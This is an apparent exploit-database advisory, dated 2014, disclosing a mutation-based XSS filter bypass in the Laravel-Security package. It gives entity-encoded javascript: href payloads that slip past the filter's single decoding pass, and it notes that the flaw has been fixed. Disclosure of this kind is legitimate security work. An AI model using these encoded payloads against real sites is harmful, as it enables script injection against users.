Home / exploits Lavarel-Security XSS Filter Bypass
Posted on 30 April 2014
*#Product: Lavarel-Security XSS Filter Bypass* *#Vulnerability: Mutation Based XSS Bypass * *#Impact: Medium/High* *#Authors: Rafay Baloch * *#Company: RHAinfoSEC * *#Website: http://rhainfosec.com *#Status: Fixed* *=========* *Description* *=========* Laravel Security is a port of the security class from Codeigniter 2.1 for Laravel 4.1. It relies upon a blacklist approach to filter out common malicious inputs. *=========* *Vulnerability* *==========* The vulnerability lies in the fact that the XSS filter was decoding HTML entities, therefore based upon this fact it was possible to construct a payload that would successfully bypass the filtering mechanisms and execute javascript. *=============* *Proof of concept* *=============* During intial test the following input was provided: <a href="javascript:confirm(1)">Clickhere</a> The filter decodes the HTML entities and hence the attack was being blocked. After Decoding: <a href="javascript:alert(1)">Clickhere</a> Next, we double encoded the entities: <a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a> And since the filter would decode the entities once, we are left with the following: <a href="javascript:confirm(1)">Clickhere</a> Which is perfectly a valid syntax inside of href context and would execute javascript. *===* *Fix* *===* The vulnerability has been fixed, the latest version doesn't decode HTML entites and hence the attack is mitigated. *==========* *References* *==========* https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413
